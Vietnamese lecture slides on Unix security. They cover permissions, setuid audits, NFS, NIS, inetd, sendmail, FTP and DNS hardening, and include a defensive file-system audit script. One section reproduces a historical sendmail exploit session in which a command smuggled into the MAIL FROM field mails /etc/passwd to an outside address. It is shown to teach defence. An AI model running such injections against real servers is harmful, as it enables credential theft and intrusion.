Chương 12 File System Security

File System Security HỆ THỐNG TẬP TIN CỦA UNIX Đối với hệ điều hành UNIX, không có khái niệm các ổ đĩa khác nhau. Sau quá trình khởi động, toàn bộ các thư mục và tập tin được ‘gắn ‘ lên (mount) và tạo thành một hệ thống tập tin thống nhất, bắt đầu từ gốc ‘/’ Sun Microsystems Inc. SunOS 5.6 Generic August 1997 $ df -k Filesystem kbytes used avail capacity Mounted on /dev/dsk/c0t0d0s0 192799 131990 41530 77% / /dev/dsk/c0t0d0s6 962983 477544 427661 53% /usr /proc 0 0 0 0% /proc fd 0 0 0 0% /dev/fd /dev/dsk/c0t0d0s3 289207 115445 144842 45% /var /dev/dsk/c0t0d0s5 465775 28807 390391 7% /opt /dev/dsk/c0t0d0s7 1290127 233611 1004911 19% /other /dev/dsk/c0t0d0s1 311983 203961 76824 73% /usr/openwin swap 418136 120 418016 1% /tmp /dev/dsk/c0t1d0s2 4124422 2359571 1723607 58% /squid $ SUN OS File System [citd@server citd]$ df -k Filesystem 1024-blocks Used Available Capacity Mounted on /dev/sda1 447044 45006 378948 11% / /dev/sda6 496627 119068 351909 25% /export /dev/sda5 496627 405042 65935 86% /usr /dev/sda7 492657 329963 137249 71% /var [citd@server citd]$ Linux File System /-------+ !-------/bin !-------/sbin !-------/usr-------/usr/bin ! !------/usr/sbin ! !------/usr/local ! !------/usr/doc ! !-------/etc !-------/lib !-------/var-------/var/adm !------/var/log !------/var/spool //usr /usr/home /squid / /usr /usr/home /squid CD /mnt /mnt/cdrom TƯƠNG ỨNG GIỮA DISK PARTITIONS VÀ CẤU TRÚC TẬP TIN GIỚI THIỆU CÁC THƯ MỤC QUAN TRỌNG CỦA UNIX / (THƯ MỤC GỐC ) /bin /sbin /usr/bin /usr/sbin /var /var/log /var/adm /home /export/home (SUNOS) Quyền và sở hữu tập tin và thư mục của Unix (directory and file permission and ownership) -rw-r—r— 1 fido users 163 Dec 7 14:31 myfile Kết quả của lệnh ls -l Khi moät taäp tin hay thö muïc ñöôïc taïo ra, noù mang owner vaø group cuûa ngöôøi taïo ra noù. Phaàn quyeàn daønh cho user, group, other phuï thuoäc vaøo giaù trò cuûa umask Ví dụ : [tnminh@pasteur tnminh]$ umask 002 [tnminh@pasteur tnminh]$ echo “tao mot file” > tmp [tnminh@pasteur tnminh]$ ls -l total 5472 -rw-rw-r-- 1 tnminh tnminh 13 Oct 3 21:55 tmp [tnminh@pasteur /etc]$ umask 022 [tnminh@pasteur tnminh]$ echo “tao mot file khac”>tmp1 [tnminh@pasteur tnminh]$ ls -l -rw-rw-r-- 1 tnminh tnminh 13 Oct 3 21:55 tmp -rw-r--r-- 1 tnminh tnminh 18 Oct 3 21:59 tmp1 Umask và các quyền truy nhập tập tin Dạng nhị phân của quyền truy nhập tập tin và thư mục Quyền truy nhập tập tin chia thành ba nhóm số cho chủ nhân (user), nhóm (group) và còn lại (others) read permission 4 write permission 2 Execute permission 1 Như vậy :  0 or —-: No permissions at all  4 or r—: read-only  2 or -w-: write-only (rare)  1 or —x: execute  6 or rw-: read and write  5 or r-x: read and execute  3 or -wx: write and execute (rare)  7 or rwx: read, write, and execute Thay đổi các thuộc tính của tập tin và thư mục Cách thay đổi tương đối :  chmod g+w myfile  thêm khả năng write cho group của myfile  chmod o-x myfile  bớt khả năng chạy của others của myfile Cách thay đổi tuyệt đối :  chmod 644 myfile => myfile sẽ có quyền rw-r--r-- Đối với các admin, nên dùng cách tuyệt đối vì nó an toàn hơn. Đối với các thư mục, thao tác hoàn toàn tương đương. chown cho phép đổi người sở hữu tập tin, Chgrp cho phép đổi nhóm của tập tin, setuid và setgid bits Set-user-id : Set-user-id nghĩa là khi chương trình được chạy, nó sẽ có quyền như người chủ (owner) của file cho dù người gọi chương trình là ai đi nữa. Ví dụ :  $ ls –l /usr/sbin/sendmail  rwsr-xr-x root root sendmail Tương tự, set-group-id cho quyền chương trình như group của tập tin chương trình. Bit thứ 4 mã giá trị này. 4 = setuid; 2= setgid, Nếu /bin/sh có setuid bit set thì ai cũng là root vì owner của /bin/sh là root và mọi user đều dùng /bin/sh khi login  . setgid cho thư mục = tập tin tạo ra trong thư mục này có cùng group như group của thư mục Setuid cho tập tin = không có tác dụng Sticky bit = user chỉ có quyền xóa file do mình là owner. Ví dụ /tmp Bảo mật hệ thống bằng kiểm tra setuid và setgid bits •Tìm tập tin có setuid bit set •find / -perm -4000 -exec ls -l {} \; •Tương tự cho setguid : •Tìm tập tin không user •find / -nouser -exec ls -l {} \; •Tìm tập tin viết được •find / -perm –2 -print •Tìm tập tin không sở hữa •find / -nouser -print -r-s--x--x 1 root root 10704 Apr 15 1999 /usr/bin/passwd -rws--x--x 2 root root 517916 Apr 7 1999 /usr/bin/suidperl -rws--x--x 2 root root 517916 Apr 7 1999 /usr/bin/sperl5.00503 -rwsr-sr-x 1 root mail 64468 Apr 7 1999 /usr/bin/procmail -rwsr-xr-x 1 root root 14036 Apr 16 1999 /usr/bin/rcp -rwsr-xr-x 1 root root 10516 Apr 16 1999 /usr/bin/rlogin •Chuù yù : Khoâng neân cho caùc shell script giaù trò setuid hay setgid. Neáu chuùng ta caàn setuid, setgid, vieát chöông trình baèng C hay moät ngoân ngöõ laäp trình töông ñöông. Một số tập tin "nguy hiểm". Trusted hosts •/etc/hosts.equiv : Người sử dụng từ một máy có IP trong tập tin này, có cùng account name, có thể sử dụng rlogin và rsh mà không cần vào password trên máy này. Rất may rằng root là một ngoại lệ . •.rhosts : giống như /etc/hosts.equiv, nhưng kiểm tra host-user. Đặc biệt user có thể tạo .rhosts không thông qua admin. Vì vậy, nên hoàn toàn cấm việc tạo ra .rhosts tại các thư mục cá nhân. Checksum và checklist •Lệnh sum cho phép xem xét xem tập tin có bị thay đổi về nội dung hay không. Điều này giúp chúng ta phát hiện được virus vì virus nói chung phải thay đổi nội dung của file. •Nên chạy sum tại những thư mục mà nội dung không thay đổi về nguyeèn tắc /sbin, /bin . Ghi lại kết quả vào một tập tin và sử dụng sau này để biết những tập tin có checksum thay đổi. •Checklist (thông qua lệnh ls) cho phép tìm ra những thay đổi của các tập tin hệ thống. Chúng ta, cũng như checksum, nên tạo một file checklist ngay từ đầu. Bằng cách này, chúng ta sẽ biết được các tập tin mới tạo ra không hợp pháp. Access Control List (ACL) •Đây là một chuẩn mới của Unix cho phép phân quyền hạn truy nhập vào hệ thống tập tin một cách chi tiết hơn hệ thống của Unix truyền thống. Hệ thống này cho phép ví dụ cả group ggg có quyền đọc và user uuu của group ggg này có quyền đọc và viết. •Hai lệnh cơ bản của ACL là getfacl và setfacl. •Nếu chúng ta bổ sung ACL cho một tập tin, chúng ta dùng lệnh •setfacl -m acl_entry_list filename •để biết một tập tin có sử dụng ACL, với lệnh ls -l ta có •-rw-r-----+ ..etc . Dấu + hiển thị rằng tập tin sử dụng ACL •Có thể sử dụng ACL trên SUN OS 5.6 Network File System (NFS) NFS, the Network File System has three important characteristics:  It makes sharing of files over a network possible.  It mostly works well enough.  It opens a can of security risks that are well understood by crackers, and easily exploited to get access (read, write and delete) to all your files. Treân nguyeân taéc, NFS server tin NFS client vaø ngöôïc laïi. Do ñoù, neáu NFS server hay client bò xaâm nhaäp seõ deã daøng daãn ñeán söï xaâm nhaäp vaøo toaøn boä maïng NFS. Client : apollon mount -o size=1024,wsize=1024 eris:/mn/eris/local /mnt cd /mnt ls –l Or in /etc/fstab # device mountpoint fs-type options dump fsckorder eris:/mn/eris/local /mnt nfs rsize=1024,wsize=1024 0 0 Server : eris. /etc/exports /mn/eris/local apollon(rw) NFS model NFS Client Security nosuid option : the server's root user cannot make a suid-root program on the file system, log in to the client as a normal user and then use the suid-root program to become root on the client. Remote Call Procedure (RPC)-based services - ñoái vôùi TCP, UDP protocols, port number coù 2 bytes (65536 max.) - Moãi RPC-based coù moät RPC service number duy nhaát 4 bytes (4294 Mports - portmapper ñôïi ôû coång 111 (TCP vaø UDP) - khi moät RPC based server khôûi ñoäng, noù seõ chieám moät coång TCP hay UDP port, sau ñoù thoâng baùo cho portmapper aùnh xaï giöõa soá RPC duy nhaát cuûa noù vaø coâng TCP/UDP noù vöøa nhaän. - khi moät RPC client muoán keát noái vôùi moät RPC-based server, noù “hoûi “ portmapper vaø ñöôïc bieát coång TCP ma ø RPC-based server ñang ñôïi. - Client vaø server “queân “ portmapper vaø noái tröïc tieáp vôùi nhau. - Keû xaâm nhaäp coù theå bypass portmapper NFS Server Security •root_squash option : Now, if a user with UID 0 on the client attempts to access (read, write, delete) the file system the server substitutes the UID of the servers `nobody' account. Which means that the root user on the client can't access or change files that only root on the server can access or change. Nhöng root cuûa client coù theå su thaønh bin hay adm vaø coù theå xaâm nhaäp vaøo caùc taäp tin coù owner=bin treân server. Vì vaäy, nhöõng taäp tin binaries hay taäp tin thöôøng quan troïng neân coù owner laø root. •portmapper vaø nfsd coù theå coù vaán ñeà veà security, cho pheùp thaâm nhaäp traùi pheùp vaøo Server file system. Ñeå khaéc phuïc sô hôû naøy caàn coù portmap: ALL trong taäp tin /etc/hosts.deny vaø portmap: 129.240.223.0/255.255.255.0 trong /etc/hosts.allow ñeå cho pheùp network 129.240.233.0 ñöôïc söû duïng portmapper •Neáu /etc/exports chæ coù file system maø khoâng coù host, moïi host ñeàu coù quyeàn mount file system cuûa server. Network Information Service (NIS, NIS+) SUN 1990 • NIS is a service that provides information, that has to be known throughout the network, to all machines on the network. Information likely to be distributed by NIS is: · login names/passwords/home directories (/etc/passwd) · group information (/etc/group) If, for example, your password entry is recorded in the NIS passwd database, you will be able to login on all machines on the network which have the NIS client programs running. • NIS+ is designed by Sun Microsystems Inc. as a replacement for NIS with better security and better handling of large installations. NIS security problems • Một workstation tham gia vào NIS cần phải có tập tin /etc/passwd với dòng cuối cùng như sau : • +::0:0::: • Hoặc +: Nếu ta dùng dòng một và quên dấu +, ta sẽ có một super-user không login name và không password ;-(. Vì vậy nên dùng dòng lệnh thứ hai) • Nếu /etc/hosts.equiv chỉ chứa + thì tất cả các user của tất cả các host có tên account như máy này có thể truy nhập không cần password. Chú ý một số Unix, kể cả SUN, cài hosts.equiv chỉ với một dòng như vậy ;-( #!/bin/sh # # fscheck - check file system for insecurities # # This should be run as root # PATH=/usr/bin:/bin export PATH CHECKDIRS="/bin /etc /usr/bin /usr/etc /usr/lib /usr/ucb" # ls.master is the file to create by command 'ls -alsgR $CHECKDIRS > ls.master MASTER_LS=ls.master # sum.master is the file to create by command 'find $CHECKDIRS -type f -exec echo -n {} " " \; -exec sum {} \; > sum.master MASTER_SUM=sum.master # echo"Set-User-Id files found:" find / -type f -a -perm -4000 -exec ls -aslg {} \; echo "" # echo."Set-Group-Id files found:" find / -type f -a -perm -2000 -exec ls -aslg {} \; echo "" # # echo"Device files not located in /dev :" find / \( -type b -o -type c \) -print) | grep -v '^/dev' echo "" # echo "World writable files and directories : " find / -perm -2 -exec ls -aslgd {} \; echo "" ## echo " Files owned by none xistents user or group :" find / \( -nouser -o -nogroup \) -exec ls -aslgd {} \; echo "" # # ls -alsgR $CHECKDIRS > /tmp/lschk.$$ # # find $CHECKDIRS -type f -exec echo -n {} " " \; -exec sum {} \; > /tmp/sumchk.$$ # # echo "Files in $CHECKDIRS whose attributes have changed : " echo " = current listing" diff $MASTER_LS /tmp/lschk.$$ echo "" # # echo "Files in $CHECKDIRS whose checksums have changed:" echo " = current listing" diff $MASTER_SUM /tmp/sumchk.$$ rm -f /tmp/lschk.$$ /tmp/sumchk.$$ exit 0 Bài 3 : Network Service Security • Trên đây, chúng ta đã đề cập nhiều đến bảo mật chống các xâm nhập thông qua các điểm yếu hay các lỗi cài đặt hệ thống của hệ điều hành UNIX. • Chúng ta sẽ chuyển sang xem xét các xâm nhập thông qua các dịch mà máy Unix mở ra cho mạng. Inetd và /etc/inet.conf • inetd được sử dụng để khởi động các daemon cung cấp các dịch vụ mạng. inetd đợi các nối mạng sau một số cổng. Khi có yêu cầu kết nối, inetd sẽ gọi chương trình server tương ứng để thiết lập các kết nối. • inetd sẽ đọc file /etc/inetd.conf khi được gọi lên bộ nhớ . • # • # Echo, discard, daytime, and chargen are used primarily for testing. • # To re-read this file after changes, just do a 'killall -HUP inetd' • #time stream tcp nowait root internal • #time dgram udp wait root internal • # • # These are standard services. • # • ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a • telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd Inetd và security • /etc/inet.conf có thể dùng để giải quyết một số vấn đề về bảo mật như sau : - Nếu chúng ta không muốn sử dụng dịch vụ nào, chúng ta chỉ việc đơn giản đặt dấu # trước dòng cấu hình kết nối đó. Với những máy tính đòi hỏi bảo mật cao, quy tắc chung là cấm hết tất cả các dịch vụ mà chúng ta không cần hoặc không biết.Trong trường hợp máy hoạt động không bình thường, chúng ta bỏ dần các chú thích # và như vậy chúng ta sẽ hiểu chức năng của các dịch vụ. - Các dịch vụ nên xem xét bỏ là finger, tftp, talk - Với dịch vụ đang có vấn đề về bảo mật nhưng không cắt đi được, chúng ta có thể giảm quyền của dịch vụ bằng cách thay thông tin trong trường user Email, SMTP và Sendmail • - Email là dịch vụ cơ bản và phổ biến nhất của Internet. Giao diện dùng cho kết nối Email là SMTP (Simple Mail Transfer Protocol). • - Sendmail là một SMTP server phổ biến nhất. Mặc dù sendmail đã bị nhiều "tai tiếng " về bảo mật trong lịch sử phát triển, nhưng đến hiện nay vẫn chưa có một chương trình nào có khả năng thay thế sendmail, nhất là về mặt tính năng. Nguyên nhân của các bug của sendmail là vì sendmail khá dài và phức tạp (#30.000 dòng lệnh), đồng thời khi chạy trên bộ nhớ, sendmail phải có quyền như root để thực hiện nhiệm vụ của mình. Tuy nhiên, do có nhiều người sử dụng sendmail, lỗi của sendmail sẽ được tìm ra rất nhanh chóng và được thông báo rộng rãi cho phép sửa chữa nhanh chóng. • 2 con đường thâm nhập qua Mail Server 1. Qua các lệnh mà mail server nhận từ ngoài : command channel attacks. Morris worm đã sử dụng con đường này bằng cách sử dụng lỗi debug của sendmail 2. Qua nội dung của mail : data-driven attacks. Các chương trình Mail Server đều sử dụng một chương trình mail local để gửi/nhận thư nội bộ của máy, giao diện với người sử dụng. Trên Unix, đó thường là /bin/mail. Nếu /bin/mail có bug, kẻ xâm nhập có thể bắt /bin/mail thực hiện các lệnh ghi trong body của mail. Thư điện tư ngày nay thường là Multimedia, do đó cần những chương trình ngoài để “đọc “ thư. Chương trình ngoài nào “đọc “ thư và “đọc “ như thế nào là ngoài tầm kiểm soát của các chương trình mail cổ điển. Ví dụ như một lễ giáng sinh, mạng của IBM bị tê liệt bị phải gửi một cách tự động hàng triệu mail có nhạc của lễ giáng sinh. Hãy cẩn thận với những thư với nội dung khuyên bạn đổi password sang một password mới từ admin, hay báo cho nhà băng code cá nhân của card visa của bạn. •Các điểm cần kiểm tra : •Dùng version mới. Cần kiểm tra version của sendmail vì một số version cũ có vấn đề liên quan tới bảo mật hệ thống •$ telnet pasteur.bvt.hcm 25 •220 pasteur.bvt.hcm ESMTP Sendmail 8.9.3/8.9.3; Wed, 17 Nov 1999 04:46:35 +0700 Một số chức năng wiz, debug không được có 220 pasteur.bvt.hcm ESMTP Sendmail 8.9.3/8.9.3; Wed, 17 Nov 1999 04:46:35 700 wiz 500 Command unrecognized: "wiz" Debug 500 Command unrecognized: "debug" Nếu debug set thì version sendmail của bạn cần phải thay Kiểm tra sendmail đang chạy Ví dụ một lỗi của sendmail • telnet victim.com 25 • Trying 128.128.128.1 … • Connected to victim.com • Escape character is '^]'. • 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 • Mail from : "|/bin/mail zen@ecil.com < /etc/passwd" • 250 "|/bin/mail zen@ecil.com < /etc/passwd" … sender OK • Rcpt to : nosuchuser • 550 nosuchuser … User unknow • Data • 354 Enter mail, end with "." on a line by itself • . • 250 Mail accepted • Quit • Connection closed by foreign host. • $ • File Transfer Protocol được thực hiện bởi ftp và ftpd. Cần sử dụng ftpd sau 1989 •Để bảo mật ftp cần cấu hình tốt cho anonymous FTP •tạo account ftp và * cho trường password để không login •tạo home directory cho account ftp (ví dụ /home/ftp) •thư mục này owner =ftp và không ai được ghi •chown ftp ~ftp •chmod 555 ~ftp •tạo các thư mục bin,etc, usr tùy thuộc theo yêu cầu của Unix đang sử dụng và các thư mục này đều có quyền 555 •chép tập tin passwd và group vào ~ftp/etc. Xóa tất cả các account, trừ ftp. 2 tập tin này có quyền 444 FTP ftp (2) • Chép ls vào ~ftp/bin với quyền 111 • Tạo thư mục ~ftp/pub với quyền 577, owner ftp. Anonymous connection sẽ dùng ftp account. • Hiện nay, nếuchúng ta cài đặt wu-ftp, các quyền của các thư mục này sẽ được làm tự động • Ví dụ ftp config của RedHat 6.0 • [tnminh@pateur /home]$ ls -l • total 9 • drwxr-xr-x 6 root root 1024 Mar 21 1999 ftp • drwxr-xr-x 2 root nobody 1024 Apr 16 1999 samba ftp (3) • [tnminh@pateur /home]$ ls -l ftp • total 4 • d--x--x--x 2 root root 1024 Nov 5 02:15 bin • d--x--x--x 2 root root 1024 Nov 5 02:15 etc • drwxr-xr-x 2 root root 1024 Nov 5 02:15 lib • dr-xr-sr-x 2 root ftp 1024 Mar 21 1999 pub • [tnminh@pateur /home]$ • [root@pateur etc]# more ~ftp/etc/passwd • root:*:0:0::: • bin:*:1:1::: • operator:*:11:0::: • ftp:*:14:50::: • nobody:*:99:99::: • [root@pateur etc]# ftp (4) : /etc/ftpusers • /etc/ftpusers chứa những account không dược nối vào qua ftp, ví dụ như root, bin … • Ví dụ /etc/ftpusers của Linux Redhat 6.0 • [root@pateur /tmp]# more /etc/ftpusers • root • bin • daemon • adm • lp • sync •shutdown •halt •mail •news •uucp •operator •games •nobody •[root@pateur /tmp]# •Tập tin /etc/shells chứa các shells mà các user được sử dụng như bash, sh, ash, bsh ... tftp • Do tftp không đòi hỏi password, chú ý vấn đề bảo mật với tftp. • Tftp của SUNOS trước 4.0 có lỗi cho phép get các tập tin, ngay cả của /etc. Cần thay version này. Domain Name System (DNS) • Lỗi đầu tiên của DNS là DNS server và client không kiểm tra xem trả lời mà nó có là từ các server mà nó hỏi hay từ một nguồn nào đó .Server có thể cache những thông tin sai lạc này và sử dụng khi có câu hỏi. • Ví dụ, kẻ xâm nhập có thể nói cho server IP của máy của họ chính là máy mà bạn tin tưởng (trusted) và máy của học có thể rlogin không qua password. • BIND Version 4.9 có sửa được lỗi kể trên • Trên một số OS (ví dụ SUNOS 4.x), quá trình lookup/double reverse lookup được tự động thực hiện. Tức là DNS sẽ tìm IP-> Name rồi Name -> IP và kiểm tra 2 IP xem có khớp không. Tuy nhiên phương pháp này không loại bỏ được hoàn toàn lỗi của DNS. Social Engineering attack • DNS thường cho rất nhiều thông tin về mạng nội bộ như tên máy, kiểu máy … Kẻ xâm nhập với những thông tin này có mạo nhận là kỹ thuật viên bảo hành đến yêu cầu được coi máy và có thể hỏi password • Làm sao không cho kẻ xâm nhập quá nhiều thông tin ? Có phương án làm 2 DNS server; một đặt tại trong firewall và có nhiều thông tin. DNS thứ hai nằm ngoài và chỉ có một số rất thông tin tối thiểu cho kết nối của mạng. Hai trường HINFO và TXT thường chứa nhiều thông tin hoàn toàn chỉ cho nội bộ . DNS Client Real DNS server DNS Client P A C K E T F I L T E R DNS Client Fake DNS server Internet Setup fake and real servers • Fake server là primary server server cho domain của bạn. Primary server cần phải có đủ thông tin về các máy cần nối trực tiếp ra Internet như www, ftp, news … servers. Các thông tin phải cho phép làm được double reverse